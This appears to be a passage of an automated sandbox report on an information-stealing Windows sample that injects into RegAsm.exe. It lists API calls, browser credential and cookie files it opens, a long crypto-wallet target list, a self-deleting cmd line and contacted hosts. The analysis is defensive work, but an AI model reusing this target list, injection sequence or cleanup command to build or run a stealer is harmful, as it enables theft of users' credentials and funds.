                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00409F72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00409900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,1_2_0040A981
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,1_2_00415E66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,1_2_00415843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040FE81 GetSystemInfo,wsprintfA,1_2_0040FE81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: FIEGCB.1.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                  Source: FIEGCB.1.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                  Source: FIEGCB.1.drBinary or memory string: discord.comVMware20,11696487552f
                  Source: FIEGCB.1.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                  Source: FIEGCB.1.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                  Source: RegAsm.exe, 00000001.00000002.2526755030.0000000001158000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.00000000010DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: FIEGCB.1.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: global block list test formVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: tasks.office.comVMware20,11696487552o
                  Source: RegAsm.exe, 00000001.00000002.2526666955.0000000000EE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarei
                  Source: FIEGCB.1.drBinary or memory string: AMC password management pageVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                  Source: FIEGCB.1.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: dev.azure.comVMware20,11696487552j
                  Source: FIEGCB.1.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                  Source: FIEGCB.1.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                  Source: FIEGCB.1.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                  Source: FIEGCB.1.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                  Source: FIEGCB.1.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                  Source: FIEGCB.1.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                  Source: FIEGCB.1.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                  Source: RegAsm.exe, 00000001.00000002.2526666955.0000000000EE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: FIEGCB.1.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                  Source: FIEGCB.1.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                  Source: FIEGCB.1.drBinary or memory string: outlook.office.comVMware20,11696487552s
                  Source: FIEGCB.1.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                  Source: FIEGCB.1.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                  Source: FIEGCB.1.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                  Source: FIEGCB.1.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                  Source: FIEGCB.1.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                  Source: RegAsm.exe, 00000001.00000002.2526755030.0000000001158000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWKp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_1-61335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00384E26 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00384E26
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0038C1CD mov ecx, dword ptr fs:[00000030h] 0_2_0038C1CD
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0039547E mov eax, dword ptr fs:[00000030h] 0_2_0039547E
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00397A7D GetProcessHeap,0_2_00397A7D
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00385095 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00385095
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00384E26 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00384E26
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00388E0B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00388E0B
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00384F82 SetUnhandledExceptionFilter,0_2_00384F82
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041937F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0041E438 SetUnhandledExceptionFilter,1_2_0041E438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041A8A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_6CC6B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6CC6B66C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_6CC6B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6CC6B1F7

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match File source: Process Memory Space: file.exe PID: 5072, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4784, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EE018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_00EE018D
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_004111BE
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BD7008
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KECBFBAEBKJJ" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00384B4C cpuid 0_2_00384B4C
                  Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0039781B
                  Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW,0_2_00397159
                  Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW,0_2_003971A4
                  Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW,0_2_0039723F
                  Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_003972CA
                  Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,0_2_0038F3B5
                  Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,0_2_0039751D
                  Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00397646
                  Source: C:\Users\user\Desktop\file.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00396EB7
                  Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW,0_2_0038EE8F
                  Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,0_2_0039774C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_0040FCE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00384D20 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00384D20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,1_2_0040FBCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_0040FC92
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: RegAsm.exe, 00000001.00000002.2526755030.0000000001158000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  Source: Yara match File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.file.exe.3a7ac0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.file.exe.3a7ac0.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match File source: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: file.exe PID: 5072, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4784, type: MEMORYSTR
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                  Source: RegAsm.exe, 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: RegAsm.exeString found in binary or memory: exodus.conf.json
                  Source: RegAsm.exeString found in binary or memory: \Exodus\
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: info.seco
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                  Source: RegAsm.exe, 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: seed.seco
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: \\config\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: \\config\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4784, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.file.exe.3a7ac0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.file.exe.3a7ac0.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match File source: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: file.exe PID: 5072, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4784, type: MEMORYSTR
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 511 Process Injection | 2 Obfuscated Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Masquerading | NTDS | 55 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Virtualization/Sandbox Evasion | LSA Secrets | 1 Network Share Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 511 Process Injection | Cached Domain Credentials | 141 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 12 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  [Behavior graph. ID: 1447265; Sample: file.exe; Startdate: 24/05/2024; Architecture: WINDOWS; Score: 100.
                  Process chain: file.exe started RegAsm.exe, which started cmd.exe, which started conhost.exe and timeout.exe.
                  Network: RegAsm.exe contacted steamcommunity.com (104.102.42.29, port 443, AKAMAI-ASUS, United States) and 65.109.242.59 (port 443, ALABANZA-BALTUS, United States).
                  Dropped by RegAsm.exe: vcruntime140[1].dll, softokn3[1].dll, nss3[1].dll (PE32) and 10 other files (none is malicious).]

                  Source | Detection | Scanner | Label | Link
                  file.exe | 42% | ReversingLabs | Win32.Trojan.Zusy |
                  file.exe | 100% | Avira | HEUR/AGEN.1317026 |
                  file.exe | 100% | Joe Sandbox ML | |
                  Source | Detection | Scanner | Label | Link
                  C:\ProgramData\KECBFBAEBKJJ\freebl3.dll | 0% | ReversingLabs | |
                  C:\ProgramData\KECBFBAEBKJJ\mozglue.dll | 0% | ReversingLabs | |
                  C:\ProgramData\KECBFBAEBKJJ\msvcp140.dll | 0% | ReversingLabs | |
                  C:\ProgramData\KECBFBAEBKJJ\nss3.dll | 0% | ReversingLabs | |
